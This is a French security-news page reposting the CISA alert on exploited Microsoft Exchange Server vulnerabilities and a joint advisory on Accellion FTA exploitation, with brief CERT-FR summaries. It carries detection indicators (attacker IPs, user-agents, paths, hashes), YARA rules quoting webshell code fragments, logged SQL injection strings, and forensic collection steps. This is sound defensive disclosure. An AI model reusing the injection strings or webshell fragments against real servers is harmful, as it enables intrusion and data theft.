Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information

Original release date: March 3, 2021 | Last revised: March 4, 2021

Summary

Cybersecurity and Infrastructure Security (CISA) partners have observed active exploitation of vulnerabilities in Microsoft Exchange Server products. Successful exploitation of these vulnerabilities allows an unauthenticated attacker to execute arbitrary code on vulnerable Exchange Servers, enabling the attacker to gain persistent system access, as well as access to files and mailboxes on the server and to credentials stored on that system. Successful exploitation may additionally enable the attacker to compromise trust and identity in a vulnerable network. Microsoft released out-of-band patches to address vulnerabilities in Microsoft Exchange Server. The vulnerabilities impact on-premises Microsoft Exchange Servers and are not known to impact Exchange Online or Microsoft 365 (formerly O365) cloud email services.

This Alert includes both tactics, techniques and procedures (TTPs) and the indicators of compromise (IOCs) associated with this malicious activity. To secure against this threat, CISA recommends organizations examine their systems for the TTPs and use the IOCs to detect any malicious activity. If an organization discovers exploitation activity, they should assume network identity compromise and follow incident response procedures. If an organization finds no activity, they should apply available patches immediately and implement the mitigations in this Alert.

Click here for IOCs in STIX format.

Technical Details

Microsoft has released out-of-band security updates to address four vulnerabilities in Exchange Server:

CVE-2021-26855 allows an unauthenticated attacker to send arbitrary HTTP requests and authenticate as the Exchange Server. The vulnerability exploits the Exchange Control Panel (ECP) via a Server-Side Request Forgery (SSRF). This would also allow the attacker to gain access to mailboxes and read sensitive information.
CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 allow for remote code execution.
- CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary write file vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server.
- CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as SYSTEM on the Exchange Server.
To locate a possible compromise of these CVEs, we encourage you to read the Microsoft Advisory.

It is possible for an attacker, once authenticated to the Exchange server, to gain access to the Active Directory environment and download the Active Directory Database.

Tactics, Techniques and Procedures

The majority of the TTPs in this section are sourced from a blog post from Volexity, a third party cybersecurity firm. Note: the United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.

Volexity has observed the following files as targets of HTTP POST requests:

/owa/auth/Current/themes/resources/logon.css
/owa/auth/Current/themes/resources/owafont_ja.css
/owa/auth/Current/themes/resources/lgnbotl.gif
/owa/auth/Current/themes/resources/owafont_ko.css
/owa/auth/Current/themes/resources/SegoeUI-SemiBold.eot
/owa/auth/Current/themes/resources/SegoeUI-SemiLight.ttf
/owa/auth/Current/themes/resources/lgnbotl.gif

Administrators should search the ECP server logs for the following string (or something similar):

S:CMD=Set-OabVirtualDirectory.ExternalUrl='

The logs can be found at <exchange install path>LoggingECPServer.

To determine possible webshell activity, administrators should search for aspx files in the following paths:

inetpubwwwrootaspnet_client (any .aspx file under this folder or sub folders)
<exchange install path>FrontEndHttpProxyecpauth (any file besides TimeoutLogoff.aspx)
<exchange install path>FrontEndHttpProxyowaauth (any file or modified file that is not part of a standard install)
<exchange install path>FrontEndHttpProxyowaauthCurrent (any aspx file in this folder or subfolders)
<exchange install path>FrontEndHttpProxyowaauth<folder with version number> (any aspx file in this folder or subfolders)

Administrators should search in the /owa/auth/Current directory for the following non-standard web log user-agents. These agents may be useful for incident responders to look at to determine if further investigation is necessary.

These should not be taken as definitive IOCs:

DuckDuckBot/1.0;+(+http://duckduckgo.com/duckduckbot.html)
facebookexternalhit/1.1+(+http://www.facebook.com/externalhit_uatext.php)
Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)
Mozilla/5.0+(compatible;+Bingbot/2.0;++http://www.bing.com/bingbot.htm)
Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html
Mozilla/5.0+(compatible;+Konqueror/3.5;+Linux)+KHTML/3.5.5+(like+Gecko)+(Exabot-Thumbnails)
Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp)
Mozilla/5.0+(compatible;+YandexBot/3.0;++http://yandex.com/bots)
Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36

Volexity observed these user-agents in conjunction with exploitation to /ecp/ URLs:

ExchangeServicesClient/0.0.0.0
python-requests/2.19.1
python-requests/2.25.1

These user-agents were also observed having connections to post-exploitation web-shell access:

antSword/v2.1
Googlebot/2.1+(+http://www.googlebot.com/bot.html)
Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)

As with the non-standard user-agents, responders can examine internet information services (IIS) logs from Exchange Servers to identify possible historical activity. Also, as with the non-standard user agents, these should not be taken as definitive IOCs:

POST /owa/auth/Current/
POST /ecp/default.flt
POST /ecp/main.css
POST /ecp/<single char>.js

Volexity has seen attackers leverage the following IP addresses. Although these are tied to virtual private servers (VPSs) servers and virtual private networks (VPNs), responders should investigate these IP addresses on their networks and act accordingly:

103.77.192[.]219
104.140.114[.]110
104.250.191[.]110
108.61.246[.]56
149.28.14[.]163
157.230.221[.]198
167.99.168[.]251
185.250.151[.]72
192.81.208[.]169
203.160.69[.]66
211.56.98[.]146
5.254.43[.]18
5.2.69[.]14
80.92.205[.]81
91.192.103[.]43

Volexity has also provided the following YARA signatures that can be run within your network to assist in finding signs of a compromise.

1.
rule webshell_aspx_simpleseesharp : Webshell Unclassified
{
    meta:
        author = “threatintel@volexity.com”
        date = “2021-03-01”
        description = “A simple ASPX Webshell that allows an attacker to write further files to disk.”
        hash = “893cd3583b49cb706b3e55ecb2ed0757b977a21f5c72e041392d1256f31166e2”

    strings:
        $header = “<%@ Page Language=”C#” %>”
        $body = “<% HttpPostedFile thisFile = Request.Files[0];thisFile.SaveAs(Path.Combine”

    condition:
        $header at 0 and
        $body and
        filesize < 1KB
}

2.
rule webshell_aspx_reGeorgTunnel : Webshell Commodity
{
    meta:
        author = “threatintel@volexity.com”
        date = “2021-03-01”
        description = “A variation on the reGeorg tunnel webshell”
        hash = “406b680edc9a1bb0e2c7c451c56904857848b5f15570401450b73b232ff38928”
        reference = “https://github.com/sensepost/reGeorg/blob/master/tunnel.aspx”

    strings:
        $s1 = “System.Net.Sockets”
        $s2 = “System.Text.Encoding.Default.GetString(Convert.FromBase64String(StrTr(Request.Headers.Get”
        // a bit more experimental
        $t1 = “.Split(‘|’)”
        $t2 = “Request.Headers.Get”
        $t3 = “.Substring(“
        $t4 = “new Socket(“
        $t5 = “IPAddress ip;”

    condition:
        all of ($s*) or
        all of ($t*)
}

3
rule webshell_aspx_sportsball : Webshell Unclassified
{
    meta:
        author = “threatintel@volexity.com”
        date = “2021-03-01”
        description = “The SPORTSBALL webshell allows attackers to upload files or execute commands on the system.”
        hash = “2fa06333188795110bba14a482020699a96f76fb1ceb80cbfa2df9d3008b5b0a”

    strings:
        $uniq1 = “HttpCookie newcook = new HttpCookie(”fqrspt”, HttpContext.Current.Request.Form”
        $uniq2 = “ZN2aDAB4rXsszEvCLrzgcvQ4oi5J1TuiRULlQbYwldE=”

        $var1 = “Result.InnerText = string.Empty;”
        $var2 = “newcook.Expires = DateTime.Now.AddDays(”
        $var3 = “System.Diagnostics.Process process = new System.Diagnostics.Process();”
        $var4 = “process.StandardInput.WriteLine(HttpContext.Current.Request.Form[””
        $var5 = “else if (!string.IsNullOrEmpty(HttpContext.Current.Request.Form[””
        $var6 = “<input type=”submit” value=”Upload” />”

    condition:
        any of ($uniq*) or
        all of ($var*)
}

A list of webshell hashes have also been provided by Microsoft:

b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0
097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e
2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1
65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5
511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1
4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea
811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d
1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944

Note: this is not an all-inclusive list of indicators of compromise and threat actors have been known to use short-term leased IP addresses that change very frequently. Organizations that do not locate any of the IOCs in this Alert within your network traffic, may nevertheless have been compromised. CISA recommendations following the guidance located in the Microsoft Advisory to check your servers for any signs of a compromise.

Conduct Forensic Analysis

Should your organization see evidence of compromise, your incident response should begin with conducting forensic analysis to collect artifacts and perform triage. Please see the following list of recommendations on how to conduct forensic analysis using various tools.

Although the following free tools are not endorsed by the Federal Government, incident responders commonly use them to perform forensics.

While collecting artifacts to perform triage, use processes and tools that minimize the alteration of the data being collected and that minimize impact to the operating system itself.

Ideally, during data collection, store the data on removable/external media and, when possible, run the artifact collection tools from the same media.

Key artifacts for triage that should be collected:

Memory
All registry hives
All windows event logs
All web logs

Memory can be collected with a variety of open source tools (e.g., FTK Imager by AccessData, Ram Capture by Belkasoft).

Registry and Windows Event logs can be collected with a variety of open source tools as well (e.g., FTK_Imager, Kroll Artifact Parser And Extractor [KAPE]).

Web logs can also be collected with a variety of open source tools (e.g., FTK Imager).

Windows Artifact Collection Guide

Execute the following steps in order.

1) Download the latest FTK Imager from https://accessdata.com/product-download/.

Note: Ensure your review of and compliance with the applicable license associated with the product referenced, which can be found in the product’s User Guide. The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.

2) Collect memory from live system using FTK Imager. See Memory Capture with FTK Imager.pdf for instructions. Note: Download and copy “FTK Imager” folder to an external drive. Run FTK Imager.exe from the FTK Imager folder from external drive. Wait until memory collect is complete before proceeding to step 2.

3) Collect important system artifacts using KAPE. See KAPE Collection Procedure. Note: Download KAPE from a separate system; do not download KAPE to the target system. Run KAPE from external drive.

4) Collect disk image using FTK Imager. See Live Image with FTK Imager.pdf for instructions. Note: Run FTK Imager.exe from the “FTK Imager” folder from external drive.

Memory Capture with FTK Imager

1) Open FTK Imager. Log into the system with Administrator privileges and launch “FTK Imager.”

Note: Ensure your review of and compliance with the applicable license associated with the product referenced. The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.

2) Open “Capture Memory. » Select “Capture Memory…” from the File menu.

Figure 1: FTK Imager – Capture Memory Command

3) Select Path and Filenames. On the window that appears, use the “Browse” button to identify the destination of the memory capture. Save the memory capture to an external device and not the main hard drive of the system. Doing so will prevent the saved file from overwriting any dataspace on the system.

Name the destination file with a descriptive name (i.e., hostname of the system).
Select the box “Include pagefile” and provide a name of the pagefile that is descriptive of the system.
Do not select “Create AD1 file.”

Figure 2: FTK Imager – Memory Capture

4) Capture Memory. Click on “Capture Memory” to begin the capture process. The process will take several minutes depending on the size of the pagefile and the amount of memory on the system.

Figure 3: FTK Imager – Capture Process

KAPE Collection Procedure [1]

1) Download KAPE from https://www.kroll.com/en/services/cyber-risk/investigate-and-respond/kroll-artifact-parser-extractor-kape.

2) Disable any antivirus or host protection mechanisms that prevent execution from removable media, or data loss prevention (DLP) mechanisms that restrict utilization of removable media.

Enable antivirus and host protection once this process is completed.

3) Unzip Kape.zip and run gkape.exe as admin from your removable media

4) Target source should be the drive on which the OS resides, typically C:.

5) Target destination should be an external drive folder, not the same drive as the Target source. If available, use an external hard drive or flash drive.

A KAPE execution with these parameters will typically produce output artifacts with a total size of 1-25 GB.
If you are going to be running KAPE on different machines and want to save to the same drive, ensure the Target destination folder is unique for each execution of KAPE.

6) Uncheck Flush checkbox (it is checked natively).

7) Check Add %d and Add %m checkboxes.

8) Select ALL checkboxes to ensure KAPE will target all available data that it is capable of targeting. This takes some time; use the down arrow and space bar to move through the list quickly.

9) Check Process VSCs checkbox.

10) Select Zip radio button and add Base name TargetOutput.

11) Ensure Deduplicate checkbox is checked (it is checked natively).

At the bottom you should now see a large Current command line, similar to:

.kape.exe –tsource C: –tdest E:%d%m –tflush –target !BasicCollection,!SANS_Triage,Avast,AviraAVLogs,Bitdefender,ComboFix,ESET,FSecure,HitmanPro,Malwarebytes, McAfee,McAfee_ePO,RogueKiller,SentinelOne,Sophos,SUPERAntiSpyware,Symantec_AV_Logs,TrendMicro,VIPRE, Webroot,WindowsDefender,Ammyy,AsperaConnect,BoxDrive,CiscoJabber,CloudStorage,ConfluenceLogs,Discord, Dropbox, Exchange,ExchangeClientAccess,ExchangeTransport,FileZilla,GoogleDrive,iTunesBackup,JavaWebCache,Kaseya,LogMeIn,Notepad++, OneDrive,OutlookPSTOST,ScreenConnect,Skype,TeamViewerLogs,TeraCopy,VNCLogs, Chrome,ChromeExtensions,Edge,Firefox,InternetExplorer,WebBrowsers,ApacheAccessLog,IISLogFiles,ManageEngineLogs, MSSQLErrorLog,NGINXLogs,PowerShellConsole,KapeTriage,MiniTimelineCollection,RemoteAdmin, VirtualDisks, Gigatribe,TorrentClients,Torrents,$Boot,$J,$LogFile,$MFT,$SDS,$T,Amcache,ApplicationEvents,BCD,CombinedLogs, EncapsulationLogging,EventLogs,EventLogs-RDP,EventTraceLogs, EvidenceOfExecution,FileSystem,GroupPolicy,LinuxOnWindowsProfileFiles,LnkFilesAndJumpLists,LogFiles,MemoryFiles, MOF,OfficeAutosave,OfficeDocumentCache,Prefetch,RDPCache,RDPLogs,RecentFileCache,Recycle, RecycleBin, RecycleBinContent,RecycleBinMetadata,RegistryHives,RegistryHivesSystem,RegistryHivesUser,ScheduledTasks,SDB, SignatureCatalog,SRUM,StartupInfo,Syscache,ThumbCache,USBDevicesLogs,WBEM,WER,WindowsFirewall, WindowsIndexSearch,WindowsNotifcationsDB,WindowsTimeline,XPRestorePoints –vss –zip TargetOutput –gui

In the bottom right corner hit the Execute! Button.
Screenshot below shows gkape.exe during execution, you will also see a command window execute. Note: KAPE usually takes less than 20 minutes to complete on a workstation; if it is taking significantly longer there may be an issue.

Figure 4: gkape.exe screenshot

Mitigations

CISA strongly recommends organizations read Microsoft’s advisory and security blog post for more information on how to look for this malicious activity and apply critical patches as soon as possible.

If patching is not an immediate option, there are other mitigation options available. However, these options should only be used as a temporary solution, not a replacement for patching. CISA recommends limiting or blocking external access to internet-facing Exchange Servers via the following:

Restrict untrusted connections to port 443, or set up a VPN to separate the Exchange Server from external access; note that this will not prevent an adversary from exploiting the vulnerability if the attacker is already in your network.
Block external access to on-premise Exchange:
- Restrict external access to OWA URL: /owa/.
- Restrict external access to Exchange Admin Center (EAC) aka Exchange Control Panel (ECP) URL: /ecp/.

CISA would like to thank Microsoft and Volexity for their contributions to this Alert.

Resources

Microsoft Advisory: https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/
Microsoft Security Blog – Hafnium targeting Exchange Servers: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
Volexity Blog: https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

References

Eric Zimmerman: KAPE Documentation

Revisions

March 3, 2021: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Source de l’article sur us-cert.gov

3 mars 2021/par Service comm.

CERTFR-2021-ALE-004 : Multiples vulnérabilités dans Microsoft Exchange Server (03 mars 2021)

Actualités, Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information

Le 2 mars 2021, Microsoft a publié des correctifs concernant des vulnérabilités critiques de type « jour zéro » (zero day) affectant les serveurs de messagerie Exchange en version 2010, 2013, 2016 et 2019.

Ces vulnérabilités permettent à un attaquant de réaliser une exécution de code …
Source de l’article sur CERT-FR

3 mars 2021/par Service comm.

CERTFR-2021-ALE-003 : Vulnérabilité dans VMWare vCenter Server (25 février 2021)

Actualités, Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information

Le 23 février 2021, WMware a publié un avis de sécurité concernant trois vulnérabilités (cf. section documentation). La vulnérabilité CVE-2021-21972 est la plus critique. Elle permet une exécution de code arbitraire à distance par un attaquant non authentifié.

Cette vulnérabilité …
Source de l’article sur CERT-FR

25 février 2021/par Service comm.

AA21-055A: Exploitation of Accellion File Transfer Appliance

Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information

Original release date: February 24, 2021

Summary

This joint advisory is the result of a collaborative effort by the cybersecurity authorities of Australia,[1] New Zealand,[2] Singapore,[3] the United Kingdom,[4] and the United States.[5][6] These authorities are aware of cyber actors exploiting vulnerabilities in Accellion File Transfer Appliance (FTA).[7] This activity has impacted organizations globally, including those in Australia, New Zealand, Singapore, the United Kingdom, and the United States.

Worldwide, actors have exploited the vulnerabilities to attack multiple federal and state, local, tribal, and territorial (SLTT) government organizations as well as private industry organizations including those in the medical, legal, telecommunications, finance, and energy sectors. According to Accellion, this activity involves attackers leveraging four vulnerabilities to target FTA customers.[8] In one incident, an attack on an SLTT organization potentially included the breach of confidential organizational data. In some instances observed, the attacker has subsequently extorted money from victim organizations to prevent public release of information exfiltrated from the Accellion appliance.

This Joint Cybersecurity Advisory provides indicators of compromise (IOCs) and recommended mitigations for this malicious activity. For a downloadable copy of IOCs, see: AA21-055A.stix and MAR-10325064-1.v1.stix.

Click here for a PDF version of this report.

Technical Details

Accellion FTA is a file transfer application that is used to share files. In mid-December 2020, Accellion was made aware of a zero-day vulnerability in Accellion FTA and released a patch on December 23, 2020. Since then, Accellion has identified cyber actors targeting FTA customers by leveraging the following additional vulnerabilities.

CVE-2021-27101 – Structured Query Language (SQL) injection via a crafted HOST header (affects FTA 9_12_370 and earlier)
CVE-2021-27102 – Operating system command execution via a local web service call (affects FTA versions 9_12_411 and earlier)
CVE-2021-27103 – Server-side request forgery via a crafted POST request (affects FTA 9_12_411 and earlier)
CVE-2021-27104 – Operating system command execution via a crafted POST request (affects FTA 9_12_370 and earlier)

One of the exploited vulnerabilities (CVE-2021-27101) is an SQL injection vulnerability that allows an unauthenticated user to run remote commands on targeted devices. Actors have exploited this vulnerability to deploy a webshell on compromised systems. The webshell is located on the target system in the file /home/httpd/html/about.html or /home/seos/courier/about.html. The webshell allows the attacker to send commands to targeted devices, exfiltrate data, and clean up logs. The clean-up functionality of the webshell helps evade detection and analysis during post incident response. The Apache /var/opt/cache/rewrite.log file may also contain the following evidence of compromise:

[.'))union(select(c_value)from(t_global)where(t_global.c_param)=('w1'))] (1) pass through /courier/document_root.html
[.'))union(select(reverse(c_value))from(t_global)where(t_global.c_param)=('w1'))] (1) pass through /courier/document_root.html
['))union(select(loc_id)from(net1.servers)where(proximity)=(0))] (1) pass through /courier/document_root.html

These entries are followed shortly by a pass-through request to sftp_account_edit.php. The entries are the SQL injection attempt indicating an attempt at exploitation of the HTTP header parameter HTTP_HOST.

Apache access logging shows successful file listings and file exfiltration:

“GET /courier/about.html?aid=1000 HTTP/1.1” 200 {Response size}
“GET /courier/about.htmldwn={Encrypted Path}&fn={encrypted file name} HTTP/1.1” 200 {Response size}

When the clean-up function is run, it modifies archived Apache access logs /var/opt/apache/c1s1-access_log.*.gz and replaces the file contents with the following string:

Binary file (standard input) matches

In two incidents, the Cybersecurity and Infrastructure Security Agency (CISA) observed a large amount of data transferred over port 443 from federal agency IP addresses to 194.88.104[.]24. In one incident, the Cyber Security Agency of Singapore observed multiple TCP sessions with IP address 45.135.229[.]179.

Organizations are encouraged to investigate the IOCs outlined in this advisory and in AR21-055A. If an Accellion FTA appears compromised, organizations can get an indication of the exfiltrated files by obtaining a list of file-last-accessed events for the target files of the symlinks located in the /home/seos/apps/1000/ folder over the period of malicious activity. This information is only indicative and may not be a comprehensive identifier of all exfiltrated files.

Mitigations

Organizations with Accellion FTA should:

Temporarily isolate or block internet access to and from systems hosting the software.
Assess the system for evidence of malicious activity including the IOCs, and obtain a snapshot or forensic disk image of the system for subsequent investigation.
If malicious activity is identified, obtain a snapshot or forensic disk image of the system for subsequent investigation, then:
- Consider conducting an audit of Accellion FTA user accounts for any unauthorized changes, and consider resetting user passwords.
- Reset any security tokens on the system, including the “W1” encryption token, which may have been exposed through SQL injection.
Update Accellion FTA to version FTA_9_12_432 or later.
Evaluate potential solutions for migration to a supported file-sharing platform after completing appropriate testing.
- Accellion has announced that FTA will reach end-of-life (EOL) on April 30, 2021.[9] Replacing software and firmware/hardware before it reaches EOL significantly reduces risks and costs.

Additional general best practices include:

Deploying automated software update tools to ensure that third-party software on all systems is running the most recent security updates provided by the software vendor.
Only using up-to-date and trusted third-party components for the software developed by the organization.
Adding additional security controls to prevent the access from unauthenticated sources.

Resources

FireEye Blog – Cyber Criminals Exploit Accellion FTA for Data Theft and Extortion
- https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html
Center for Internet Security (CIS) Critical Security Controls for Effective Cyber Defense, known as « CIS Controls »
- https://www.cisecurity.org/controls/
- https://www.cisecurity.org/ms-isac/
Australia, Canada, New Zealand, the United Kingdom, and the United States Joint Advisory on Technical Approaches to Uncovering and Remediating Malicious Activity
- https://us-cert.cisa.gov/ncas/alerts/aa20-245a
CISA and MS-ISAC’s Ransomware Guide
- https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C.pdf

References

Revisions

February 24, 2021: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Source de l’article sur us-cert.gov

24 février 2021/par Service comm.